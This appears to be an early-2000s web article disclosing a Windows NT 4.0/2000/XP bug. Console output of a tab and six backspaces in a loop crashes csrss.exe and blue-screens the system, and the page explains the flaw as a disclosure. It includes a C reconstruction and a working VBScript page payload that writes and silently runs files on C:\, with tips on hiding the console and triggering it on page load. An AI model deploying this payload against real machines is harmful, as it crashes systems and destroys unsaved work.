HOW TO crash Windows NT 4.0\2000\XP using only VBScript
Update 16/2/2003. It has come to my attention that this bug has been fixed in Windows NT 4.0 SP6a,
Windows 2000 SP3 and Windows XP SP1. The script below also only works when run as a local script: it does not
run from the Internet zone in the browser, where the FileSystemObject and WScript.Shell ActiveX objects it
needs are not allowed to be created.
In the March 2002 issue of the computing journal Windows::Developer, on page 44, a small C program
was published that crashes Microsoft Windows NT 4.0 and 2000. The Windows term for this type of crash is a
"blue screen": the Windows user interface disappears and a blue screen is displayed with
diagnostic information in white text, after which the operating system must be rebooted. This type of crash
is normally caused by a faulty device driver raising a STOP error, but this program is extremely simple and
runs entirely in user mode.
The original program
The article says that this program was originally posted by Masaru Tsuchiyama on the comp.os.ms-windows.programmer.win32 newsgroup.
The program runs in an infinite loop, continually printing the string "Hung up" followed by one tab character and six
backspace characters. In the command prompt the tab moves the cursor 4 characters along, then the six backspaces move
the cursor 6 characters back, so each iteration leaves the cursor further back than it started.
In practice, the leading part of the string can be any valid string.
After 2 iterations the cursor is behind the start position; presumably the cursor pointer kept by the command prompt
is then pointing at memory it does not own. As the program loops again and again the position drifts further out of
range, eventually causing a protection fault in a Windows subsystem.
I would expect this code to cause a protection fault in the application only; it shouldn't crash the operating system.
Perhaps Microsoft can shed light on this problem? This program does not cause a similar problem on Windows 95\98 or ME.
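The C listing itself is not reproduced on this page, so here is a reconstruction built from the description above. It is added here and is not the published program or Masaru Tsuchiyama's code: only the ingredients (a leading string, one tab, six backspaces, written in an endless loop) come from the article, while the payload-builder function, the 64-byte buffer and the "Hung up" leading text are my own choices.

```c
#include <stdio.h>
#include <string.h>

/* Six backspaces follow the tab, as described in the article. */
#define HANGUP_BACKSPACES 6

/* Build one iteration of the payload into buf: the leading text, one TAB
 * (0x09) and six BS (0x08) characters, NUL-terminated.
 * Returns the payload length in bytes, or -1 if buf is too small.
 * (Helper added for this reconstruction; the original just used a literal.) */
int build_hangup_payload(const char *leading, char *buf, size_t buflen)
{
    size_t lead = strlen(leading);
    size_t need = lead + 1 + HANGUP_BACKSPACES + 1;   /* text + TAB + 6*BS + NUL */
    if (buflen < need)
        return -1;
    memcpy(buf, leading, lead);
    buf[lead] = '\t';
    memset(buf + lead + 1, '\b', HANGUP_BACKSPACES);
    buf[lead + 1 + HANGUP_BACKSPACES] = '\0';
    return (int)(lead + 1 + HANGUP_BACKSPACES);
}

int main(void)
{
    char payload[64];
    if (build_hangup_payload("Hung up", payload, sizeof payload) < 0)
        return 1;
    /* On unpatched NT 4.0 / 2000 this loop crashes the Windows subsystem;
     * on anything else it just scrolls garbage until interrupted (Ctrl-C). */
    for (;;)
        fputs(payload, stdout);
}
```

For "Hung up" the payload is 14 bytes: the 7 letters, 0x09, then 0x08 six times; that byte sequence is exactly what the VBScript version later in this page assembles with chr(9) and chr(8).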
The script risk
When we saw this, someone commented on the potential danger of it being executed from a script, particularly on a
web page. We thought it was impossible; it's a pity that it wasn't.
VBScript in a web page
I believed that this program could be reproduced purely in script. An executable console application generated
by a C compiler is one thing, but a script is more dangerous because it could be used on a web page.
If you wish to test this script, download it here.
Important! Close all of your applications and save your work before you test this.
For additional safety the script only runs when the button is pressed, but it could equally be called from the
Window_onLoad handler, crashing the machine without warning.
<input type="BUTTON" name="Write" value="Click me" language=VBS onclick="WriteToFile">
<script language="VBScript">
Sub WriteToFile
  Dim fso, f, w
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.OpenTextFile("c:\hangup.vbs", 2, True)  ' 2 = ForWriting, create if missing
  f.WriteLine "While 1"  ' payload: endless loop writing "a", a tab, then six backspaces
  f.WriteLine " WScript.StdOut.Write ""a""+chr(9)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)"
  f.WriteLine "Wend"
  f.Close
  Set f = fso.OpenTextFile("c:\hangup.bat", 2, True)  ' batch file runs the payload under cscript.exe
  f.WriteLine "cscript c:\hangup.vbs"
  f.Close
  Set w = CreateObject("WScript.Shell")
  w.Run "c:\hangup.bat", 2  ' 2 = minimised window, hides the console from the user
End Sub
</script>
The page uses VBScript to write a second VBScript file, which is then executed by the CScript.exe scripting
host. CScript.exe is used rather than WScript.exe because it runs the script with a console and so allows text
output to it. Note that WScript.StdOut.Write is used; the problem does not occur when WScript.Write is used.
Also note that the batch file is run minimised by passing 2 as the second parameter to the Run
method. This hides the console from the user, so they may not see what is happening until it is too late.
I wrote this script to illustrate the problem, using the Windows Script Host shell object to execute the
script and FileSystemObject to write the dangerous script payload from the page.
It could be executed from a web page, and it may even be possible to have it executed on a web server, although
I cannot think of a way to do this yet. XML and SOAP servers that load script into a DOM document may be susceptible
to this. The potential for mischief is enormous!
The bottom line is: if it runs unpatched Windows NT 4.0\2000 or XP and it executes this script, it will crash.
The crash screen
Here is a transcript of the crash report on Windows NT 4.0 with Service Pack 6 installed.
STOP: c000021a (Fatal System Error)
The Windows SubSystem system process terminated unexpectedly
with a status of 0xc0000005 (0x77f7d670 0x00a3fa30).
The system has been shut down.
Restart and set the recovery options in the system control panel
or the /CRASHDEBUG system start option. If this message reappears,
contact your system administration or technical support group.
STOP c000021a is raised when a critical user-mode system process dies. The "Windows SubSystem system process"
named here is csrss.exe, which on NT 4.0 and 2000 services console output on behalf of every console program,
so an access violation (status 0xc0000005) inside its console code takes the whole system down rather than just
the program that wrote the bad output. That is why a plain user-mode program can produce a blue screen at all.
On Windows 2000 with Service Pack 2 installed it caused a blue screen too.
On Windows XP the operating system rebooted but did not show a blue screen; note that XP's default Startup and
Recovery setting is to restart automatically on a system failure, so the STOP may simply not have been visible.